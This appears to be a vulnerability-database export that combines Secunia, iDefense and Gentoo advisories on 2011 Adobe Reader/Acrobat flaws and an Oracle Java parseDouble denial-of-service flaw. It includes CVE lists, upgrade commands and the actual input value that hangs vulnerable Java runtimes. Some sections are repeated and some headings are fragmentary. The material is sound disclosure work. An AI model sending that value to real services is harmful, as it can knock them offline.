14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
----------------------------------------------------------------------
----------------------------------------------------------------------
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0061 | CVE-2011-0602 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution. This is a different vulnerability from CVE-2011-0596, CVE-2011-0598 and CVE-2011-0599. A third party may execute arbitrary code via such an image.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
BACKGROUND
Adobe Reader/Acrobat is a Portable Document Format (PDF) viewer. For
more information, see the vendor's site found at the following link.
http://www.adobe.com/products/reader/
II.
JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to
JPEG markers, JP2K files also provide "boxes" that define different
image properties. Several different JP2K record types are involved in the
vulnerability. It is possible to increment a buffer index beyond the
allocated data, and store pointers to file data at that location. This
can result in the corruption of heap structures and application data,
which leads to the execution of arbitrary code.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the web page or opening the
file. Since PDF files can be embedded into web pages and parsed without
interaction by default, this vulnerability can be exploited as a
typical browser vulnerability. To exploit this vulnerability, a
targeted user must load a malicious webpage created by an attacker. An
attacker typically accomplishes this via social engineering or
injecting content into compromised, trusted sites. After the user
visits the malicious web page, no further user interaction is needed.
IV. A full list of vulnerable
Adobe products can be found in Adobe Security Bulletin APSB11-03.
V. WORKAROUND
Disabling the web view mode of Adobe Reader will prevent exploitation
through the browser.
VI. VENDOR RESPONSE
Adobe has addressed this issue with an update. Further details and
patches can be found at the following URL.
http://www.adobe.com/support/security/bulletins/apsb11-03.html
VII. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
11/17/2010 Initial Vendor Notification
11/17/2010 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright © 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
----------------------------------------------------------------------
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in an RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors of 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
----------------------------------------------------------------------
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0280 | CVE-2010-4476 |
IBM WebSphere Application Server vulnerable to denial-of-service (DoS)
Related entries in the VARIoT exploits database: VAR-E-201003-0021, VAR-E-201102-0765 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308. A wide range of products are affected. Multiple Oracle products ship the Java Runtime Environment, whose components, including the Java language and APIs, contain a flaw in the handling of such input that affects availability; a third party may exploit it to cause a denial of service (DoS). IBM WebSphere Application Server (WAS) contains a denial-of-service (DoS) vulnerability due to this issue in the Java Runtime Environment (JRE). According to the developer: "For other IBM software products that contain an affected version of WAS, an update is required. Specifically, WebSphere Process Server (WPS), WebSphere Enterprise Service Bus (WESB), WebSphere Virtual Enterprise (WVE), WebSphere Commerce and others are applicable. Also, IBM HTTP Server is not affected by this vulnerability." A remote attacker may cause a denial of service (DoS).
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Oracle JRE/JDK: Multiple vulnerabilities
Date: November 05, 2011
Bugs: #340421, #354213, #370559, #387851
ID: 201111-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in the Oracle JRE/JDK,
allowing attackers to cause unspecified impact.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jre-bin < 1.6.0.29 >= 1.6.0.29 *
2 app-emulation/emul-linux-x86-java < 1.6.0.29 >= 1.6.0.29 *
3 dev-java/sun-jdk < 1.6.0.29 >= 1.6.0.29 *
-------------------------------------------------------------------
NOTE: Packages marked with asterisks require manual intervention!
-------------------------------------------------------------------
3 affected packages
-------------------------------------------------------------------
Description
===========
Multiple vulnerabilities have been reported in the Oracle Java
implementation. Please review the CVE identifiers referenced below and
the associated Oracle Critical Patch Update Advisory for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Oracle JDK 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jdk-1.6.0.29"
All Oracle JRE 1.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-java/sun-jre-bin-1.6.0.29"
All users of the precompiled 32-bit Oracle JRE 1.6 should upgrade to
the latest version:
# emerge --sync
# emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.6.0.29"
NOTE: As Oracle has revoked the DLJ license for its Java
implementation, the packages can no longer be updated automatically.
This limitation is not present on a non-fetch restricted implementation
such as dev-java/icedtea-bin.
References
==========
[ 1 ] CVE-2010-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3541
[ 2 ] CVE-2010-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3548
[ 3 ] CVE-2010-3549
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3549
[ 4 ] CVE-2010-3550
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3550
[ 5 ] CVE-2010-3551
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3551
[ 6 ] CVE-2010-3552
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3552
[ 7 ] CVE-2010-3553
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3553
[ 8 ] CVE-2010-3554
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3554
[ 9 ] CVE-2010-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3555
[ 10 ] CVE-2010-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3556
[ 11 ] CVE-2010-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3557
[ 12 ] CVE-2010-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3558
[ 13 ] CVE-2010-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3559
[ 14 ] CVE-2010-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3560
[ 15 ] CVE-2010-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3561
[ 16 ] CVE-2010-3562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3562
[ 17 ] CVE-2010-3563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3563
[ 18 ] CVE-2010-3565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3565
[ 19 ] CVE-2010-3566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3566
[ 20 ] CVE-2010-3567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3567
[ 21 ] CVE-2010-3568
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3568
[ 22 ] CVE-2010-3569
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3569
[ 23 ] CVE-2010-3570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3570
[ 24 ] CVE-2010-3571
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3571
[ 25 ] CVE-2010-3572
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3572
[ 26 ] CVE-2010-3573
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3573
[ 27 ] CVE-2010-3574
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3574
[ 28 ] CVE-2010-4422
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4422
[ 29 ] CVE-2010-4447
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4447
[ 30 ] CVE-2010-4448
